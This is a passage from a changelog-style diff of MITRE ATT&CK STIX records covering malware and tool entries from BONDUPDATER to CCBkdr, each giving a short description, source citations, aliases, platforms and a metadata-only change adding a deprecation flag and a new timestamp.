"[BONDUPDATER](https://attack.mitre.org/software/S0360) is a PowerShell backdoor used by [OilRig](https://attack.mitre.org/groups/G0049). It was first observed in November 2017 during targeting of a Middle Eastern government organization, and an updated version was observed in August 2018 being used to target a government organization with spearphishing emails.(Citation: FireEye APT34 Dec 2017)(Citation: Palo Alto OilRig Sep 2018)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0360", + "external_id": "S0360" + }, + { + "source_name": "FireEye APT34 Dec 2017", + "description": "Sardiwal, M, et al. (2017, December 7). New Targeted Attack in the Middle East by APT34, a Suspected Iranian Threat Group, Using CVE-2017-11882 Exploit. Retrieved December 20, 2017.", + "url": "https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html" + }, + { + "source_name": "Palo Alto OilRig Sep 2018", + "description": "Wilhoit, K. and Falcone, R. (2018, September 12). OilRig Uses Updated BONDUPDATER to Target Middle Eastern Government. Retrieved February 18, 2019.", + "url": "https://unit42.paloaltonetworks.com/unit42-oilrig-uses-updated-bondupdater-target-middle-eastern-government/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "BONDUPDATER" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:47.458000+00:00\", \"old_value\": \"2025-04-16 20:38:37.261000+00:00\"}}}", + "previous_version": "1.2" + }, + { + "type": "malware", + "id": "malware--67fc172a-36fa-4a35-88eb-4ba730ed52a6", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:32:15.994000+00:00", + "modified": "2025-04-25 14:43:38.100000+00:00", + "name": "BS2005", + "description": "[BS2005](https://attack.mitre.org/software/S0014) is malware that was used by [Ke3chang](https://attack.mitre.org/groups/G0004) in spearphishing campaigns since at least 2011. (Citation: Mandiant Operation Ke3chang November 2014)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0014", + "external_id": "S0014" + }, + { + "source_name": "Mandiant Operation Ke3chang November 2014", + "description": "Villeneuve, N., Bennett, J. T., Moran, N., Haq, T., Scott, M., & Geers, K. (2014). OPERATION \u201cKE3CHANG\u201d: Targeted Attacks Against Ministries of Foreign Affairs. Retrieved November 12, 2014.", + "url": "https://www.mandiant.com/resources/operation-ke3chang-targeted-attacks-against-ministries-of-foreign-affairs" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "BS2005" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:38.100000+00:00\", \"old_value\": \"2025-04-16 20:38:14.043000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--123bd7b3-675c-4b1a-8482-c55782b20e2b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:32:33.738000+00:00", + "modified": "2025-04-25 14:42:44.013000+00:00", + "name": "BUBBLEWRAP", + "description": "[BUBBLEWRAP](https://attack.mitre.org/software/S0043) is a full-featured, second-stage backdoor used by the [admin@338](https://attack.mitre.org/groups/G0018) group. It is set to run when the system boots and includes functionality to check, upload, and register plug-ins that can further enhance its capabilities. (Citation: FireEye admin@338)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0043", + "external_id": "S0043" + }, + { + "source_name": "FireEye admin@338", + "description": "FireEye Threat Intelligence. (2015, December 1). China-based Cyber Threat Group Uses Dropbox for Malware Communications and Targets Hong Kong Media Outlets. Retrieved December 4, 2015.", + "url": "https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "BUBBLEWRAP", + "Backdoor.APT.FakeWinHTTPHelper" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:42:44.013000+00:00\", \"old_value\": \"2025-04-16 20:37:56.566000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--61c7a91a-0b83-461d-ad32-75d96eed4a09", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-08-11 17:36:46.197000+00:00", + "modified": "2025-04-25 14:43:34.138000+00:00", + "name": "Babuk", + "description": "[Babuk](https://attack.mitre.org/software/S0638) is a Ransomware-as-a-service (RaaS) malware that has been used since at least 2021. The operators of [Babuk](https://attack.mitre.org/software/S0638) employ a \"Big Game Hunting\" approach to targeting major enterprises and operate a leak site to post stolen data as part of their extortion scheme.(Citation: Sogeti CERT ESEC Babuk March 2021)(Citation: McAfee Babuk February 2021)(Citation: CyberScoop Babuk February 2021)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0638", + "external_id": "S0638" + }, + { + "source_name": "Babyk", + "description": "(Citation: Sogeti CERT ESEC Babuk March 2021)(Citation: McAfee Babuk February 2021)(Citation: Trend Micro Ransomware February 2021)" + }, + { + "source_name": "Vasa Locker", + "description": "(Citation: Sogeti CERT ESEC Babuk March 2021)(Citation: McAfee Babuk February 2021)" + }, + { + "source_name": "Sogeti CERT ESEC Babuk March 2021", + "description": "Sogeti. (2021, March). Babuk Ransomware. Retrieved August 11, 2021.", + "url": "https://www.sogeti.com/globalassets/reports/cybersecchronicles_-_babuk.pdf" + }, + { + "source_name": "McAfee Babuk February 2021", + "description": "Mundo, A. et al. (2021, February). Technical Analysis of Babuk Ransomware. Retrieved August 11, 2021.", + "url": "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-babuk-ransomware.pdf" + }, + { + "source_name": "CyberScoop Babuk February 2021", + "description": "Lyngaas, S. (2021, February 4). Meet Babuk, a ransomware attacker blamed for the Serco breach. Retrieved August 11, 2021.", + "url": "https://www.cyberscoop.com/babuk-ransomware-serco-attack/" + }, + { + "source_name": "Trend Micro Ransomware February 2021", + "description": "Centero, R. et al. (2021, February 5). New in Ransomware: Seth-Locker, Babuk Locker, Maoloa, TeslaCrypt, and CobraLocker. Retrieved August 11, 2021.", + "url": "https://www.trendmicro.com/en_us/research/21/b/new-in-ransomware.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Babuk", + "Babyk", + "Vasa Locker" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Hiroki Nagahama, NEC Corporation", + "Pooja Natarajan, NEC Corporation India", + "Manikantan Srinivasan, NEC Corporation India", + "Daniyal Naeem, BT Security" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Linux" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:34.138000+00:00\", \"old_value\": \"2025-04-16 20:38:12.880000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--9af05de0-bc09-4511-a350-5eb8b06185c1", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2019-01-29 21:33:34.082000+00:00", + "modified": "2025-04-25 14:44:11.108000+00:00", + "name": "BadPatch", + "description": "[BadPatch](https://attack.mitre.org/software/S0337) is a Windows Trojan that was used in a Gaza Hackers-linked campaign.(Citation: Unit 42 BadPatch Oct 2017)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0337", + "external_id": "S0337" + }, + { + "source_name": "BadPatch", + "description": "(Citation: Unit 42 BadPatch Oct 2017)" + }, + { + "source_name": "Unit 42 BadPatch Oct 2017", + "description": "Bar, T., Conant, S. (2017, October 20). BadPatch. Retrieved November 13, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2017/10/unit42-badpatch/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "BadPatch" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:11.108000+00:00\", \"old_value\": \"2025-04-16 20:38:25.897000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--835a79f1-842d-472d-b8f4-d54b545c341b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-10-17 00:14:20.652000+00:00", + "modified": "2025-04-25 14:43:54.316000+00:00", + "name": "Bandook", + "description": "[Bandook](https://attack.mitre.org/software/S0234) is a commercially available RAT, written in Delphi and C++, that has been available since at least 2007. It has been used against government, financial, energy, healthcare, education, IT, and legal organizations in the US, South America, Europe, and Southeast Asia. [Bandook](https://attack.mitre.org/software/S0234) has been used by [Dark Caracal](https://attack.mitre.org/groups/G0070), as well as in a separate campaign referred to as \"Operation Manul\".(Citation: EFF Manul Aug 2016)(Citation: Lookout Dark Caracal Jan 2018)(Citation: CheckPoint Bandook Nov 2020)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0234", + "external_id": "S0234" + }, + { + "source_name": "EFF Manul Aug 2016", + "description": "Galperin, E., Et al.. (2016, August). I Got a Letter From the Government the Other Day.... Retrieved April 25, 2018.", + "url": "https://www.eff.org/files/2016/08/03/i-got-a-letter-from-the-government.pdf" + }, + { + "source_name": "Lookout Dark Caracal Jan 2018", + "description": "Blaich, A., et al. (2018, January 18). Dark Caracal: Cyber-espionage at a Global Scale. Retrieved April 11, 2018.", + "url": "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf" + }, + { + "source_name": "CheckPoint Bandook Nov 2020", + "description": "Check Point. (2020, November 26). Bandook: Signed & Delivered. Retrieved May 31, 2021.", + "url": "https://research.checkpoint.com/2020/bandook-signed-delivered/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Bandook" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "2.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:54.316000+00:00\", \"old_value\": \"2025-04-16 20:38:20.706000+00:00\"}}}", + "previous_version": "2.0" + }, + { + "type": "malware", + "id": "malware--1f6e3702-7ca1-4582-b2e7-4591297d05a8", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-10-17 00:14:20.652000+00:00", + "modified": "2025-04-25 14:42:48.512000+00:00", + "name": "Bankshot", + "description": "[Bankshot](https://attack.mitre.org/software/S0239) is a remote access tool (RAT) that was first reported by the Department of Homeland Security in December of 2017. In 2018, [Lazarus Group](https://attack.mitre.org/groups/G0032) used the [Bankshot](https://attack.mitre.org/software/S0239) implant in attacks against the Turkish financial sector. (Citation: McAfee Bankshot)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0239", + "external_id": "S0239" + }, + { + "source_name": "Bankshot", + "description": "(Citation: McAfee Bankshot)" + }, + { + "source_name": "Trojan Manuscript", + "description": "(Citation: McAfee Bankshot)" + }, + { + "source_name": "McAfee Bankshot", + "description": "Sherstobitoff, R. (2018, March 08). Hidden Cobra Targets Turkish Financial Sector With New Bankshot Implant. Retrieved May 18, 2018.", + "url": "https://securingtomorrow.mcafee.com/mcafee-labs/hidden-cobra-targets-turkish-financial-sector-new-bankshot-implant/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Bankshot", + "Trojan Manuscript" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:42:48.512000+00:00\", \"old_value\": \"2025-04-16 20:37:57.714000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--63c4511b-2d6e-4bb2-b582-e2e99a8a467d", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-01-14 19:58:17.917000+00:00", + "modified": "2025-04-25 14:43:35.224000+00:00", + "name": "BlackMould", + "description": "[BlackMould](https://attack.mitre.org/software/S0564) is a web shell based on [China Chopper](https://attack.mitre.org/software/S0020) for servers running Microsoft IIS. First reported in December 2019, it has been used in malicious campaigns by [GALLIUM](https://attack.mitre.org/groups/G0093) against telecommunication providers.(Citation: Microsoft GALLIUM December 2019)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0564", + "external_id": "S0564" + }, + { + "source_name": "Microsoft GALLIUM December 2019", + "description": "MSTIC. (2019, December 12). GALLIUM: Targeting global telecom. Retrieved January 13, 2021.", + "url": "https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "BlackMould" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:35.224000+00:00\", \"old_value\": \"2025-04-16 20:38:13.187000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--4c6d62c2-89f5-4159-8fab-0190b1f9d328", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-07-16 14:59:40.051000+00:00", + "modified": "2025-04-25 14:43:14.836000+00:00", + "name": "Bonadan", + "description": "[Bonadan](https://attack.mitre.org/software/S0486) is a malicious version of OpenSSH which acts as a custom backdoor. [Bonadan](https://attack.mitre.org/software/S0486) has been active since at least 2018 and combines a new cryptocurrency-mining module with the same credential-stealing module used by the Onderon family of backdoors.(Citation: ESET ForSSHe December 2018)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0486", + "external_id": "S0486" + }, + { + "source_name": "ESET ForSSHe December 2018", + "description": "Dumont, R., M.L\u00e9veill\u00e9, M., Porcher, H. (2018, December 1). THE DARK SIDE OF THE FORSSHE A landscape of OpenSSH backdoors. Retrieved July 16, 2020.", + "url": "https://www.welivesecurity.com/wp-content/uploads/2018/12/ESET-The_Dark_Side_of_the_ForSSHe.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Bonadan" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:14.836000+00:00\", \"old_value\": \"2025-04-16 20:38:06.109000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--c26f1c05-b861-4970-94dc-2f7f921a3074", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-08-03 14:55:46.682000+00:00", + "modified": "2025-04-25 14:44:37.490000+00:00", + "name": "BoomBox", + "description": "[BoomBox](https://attack.mitre.org/software/S0635) is a downloader responsible for executing next stage components that has been used by [APT29](https://attack.mitre.org/groups/G0016) since at least 2021.(Citation: MSTIC Nobelium Toolset May 2021)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0635", + "external_id": "S0635" + }, + { + "source_name": "MSTIC Nobelium Toolset May 2021", + "description": "MSTIC. (2021, May 28). Breaking down NOBELIUM\u2019s latest early-stage toolset. Retrieved August 4, 2021.", + "url": "https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "BoomBox" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:37.490000+00:00\", \"old_value\": \"2025-04-16 20:38:34.236000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--919a056e-5104-43b9-ad55-2ac929108b71", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-09-27 20:50:56.335000+00:00", + "modified": "2025-04-25 14:44:03.536000+00:00", + "name": "BoxCaon", + "description": "[BoxCaon](https://attack.mitre.org/software/S0651) is a Windows backdoor that was used by [IndigoZebra](https://attack.mitre.org/groups/G0136) in a 2021 spearphishing campaign against Afghan government officials. [BoxCaon](https://attack.mitre.org/software/S0651)'s name stems from similarities shared with the malware family [xCaon](https://attack.mitre.org/software/S0653).(Citation: Checkpoint IndigoZebra July 2021)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0651", + "external_id": "S0651" + }, + { + "source_name": "BoxCaon", + "description": "(Citation: Checkpoint IndigoZebra July 2021)(Citation: HackerNews IndigoZebra July 2021)" + }, + { + "source_name": "Checkpoint IndigoZebra July 2021", + "description": "CheckPoint Research. (2021, July 1). IndigoZebra APT continues to attack Central Asia with evolving tools. Retrieved September 24, 2021.", + "url": "https://research.checkpoint.com/2021/indigozebra-apt-continues-to-attack-central-asia-with-evolving-tools/" + }, + { + "source_name": "HackerNews IndigoZebra July 2021", + "description": "Lakshmanan, R.. (2021, July 1). IndigoZebra APT Hacking Campaign Targets the Afghan Government. Retrieved September 24, 2021.", + "url": "https://thehackernews.com/2021/07/indigozebra-apt-hacking-campaign.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "BoxCaon" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Pooja Natarajan, NEC Corporation India", + "Yoshihiro Kori, NEC Corporation", + "Manikantan Srinivasan, NEC Corporation India" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:03.536000+00:00\", \"old_value\": \"2025-04-16 20:38:23.138000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--7bef1b56-4870-4e74-b32a-7dd88c390c44", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-07-01 19:34:28.366000+00:00", + "modified": "2025-04-25 14:43:50.199000+00:00", + "name": "Bundlore", + "description": "[Bundlore](https://attack.mitre.org/software/S0482) is adware written for macOS that has been in use since at least 2015. Though categorized as adware, [Bundlore](https://attack.mitre.org/software/S0482) has many features associated with more traditional backdoors.(Citation: MacKeeper Bundlore Apr 2019)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0482", + "external_id": "S0482" + }, + { + "source_name": "OSX.Bundlore", + "description": "(Citation: MacKeeper Bundlore Apr 2019)" + }, + { + "source_name": "MacKeeper Bundlore Apr 2019", + "description": "Sushko, O. (2019, April 17). macOS Bundlore: Mac Virus Bypassing macOS Security Features. Retrieved June 30, 2020.", + "url": "https://mackeeper.com/blog/post/610-macos-bundlore-adware-analysis/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Bundlore", + "OSX.Bundlore" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "macOS" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:50.199000+00:00\", \"old_value\": \"2025-04-16 20:38:18.925000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--5a84dc36-df0d-4053-9b7c-f0c388a57283", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:32:20.137000+00:00", + "modified": "2025-04-25 14:43:28.496000+00:00", + "name": "CALENDAR", + "description": "[CALENDAR](https://attack.mitre.org/software/S0025) is malware used by [APT1](https://attack.mitre.org/groups/G0006) that mimics legitimate Gmail Calendar traffic. (Citation: Mandiant APT1)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0025", + "external_id": "S0025" + }, + { + "source_name": "Mandiant APT1", + "description": "Mandiant. (n.d.). APT1 Exposing One of China\u2019s Cyber Espionage Units. Retrieved July 18, 2016.", + "url": "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "CALENDAR" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:28.496000+00:00\", \"old_value\": \"2025-04-16 20:38:10.875000+00:00\"}}}", + "previous_version": "1.2" + }, + { + "type": "tool", + "id": "tool--5fc81b43-62b5-41b1-9113-c79ae5f030c4", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-06-02 19:10:29.513000+00:00", + "modified": "2025-04-25 14:45:20.112000+00:00", + "name": "CARROTBALL", + "description": "[CARROTBALL](https://attack.mitre.org/software/S0465) is an FTP downloader utility that has been in use since at least 2019. [CARROTBALL](https://attack.mitre.org/software/S0465) has been used as a downloader to install [SYSCON](https://attack.mitre.org/software/S0464).(Citation: Unit 42 CARROTBAT January 2020)", + "revoked": false, + "labels": [ + "tool" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0465", + "external_id": "S0465" + }, + { + "source_name": "Unit 42 CARROTBAT January 2020", + "description": "McCabe, A. (2020, January 23). The Fractured Statue Campaign: U.S. Government Agency Targeted in Spear-Phishing Attacks. Retrieved June 2, 2020.", + "url": "https://unit42.paloaltonetworks.com/the-fractured-statue-campaign-u-s-government-targeted-in-spear-phishing-attacks/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "CARROTBALL" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:45:20.112000+00:00\", \"old_value\": \"2025-04-16 20:38:52.338000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--b0f13390-cec7-4814-b37c-ccec01887faa", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-04-18 17:59:24.739000+00:00", + "modified": "2025-04-25 14:44:25.199000+00:00", + "name": "CCBkdr", + "description": "[CCBkdr](https://attack.mitre.org/software/S0222) is malware that was injected into a signed version of CCleaner and distributed from CCleaner's distribution website. (Citation: Talos CCleanup 2017) (Citation: Intezer Aurora Sept 2017)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0222", + "external_id": "S0222" + }, + { + "source_name": "Talos CCleanup 2017", + "description": "Brumaghin, E. et al. (2017, September 18). CCleanup: A Vast Number of Machines at Risk. Retrieved March 9, 2018.", + "url": "http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html" + }, + { + "source_name": "Intezer Aurora Sept 2017", + "description": "Rosenberg, J. (2017, September 20). Evidence Aurora Operation Still Active: Supply Chain Attack Through CCleaner. Retrieved February 13, 2018.", + "url": "http://www.intezer.com/evidence-aurora-operation-still-active-supply-chain-attack-through-ccleaner/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "CCBkdr" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:25.199000+00:00\", \"old_value\": \"2025-04-16 20:38:30.519000+00:00\"}}}", + "previous_version": "1.2" + }, + { + "type": "tool", + "id": "tool--c9cd7ec9-40b7-49db-80be-1399eddd9c52", + "created_by_ref": 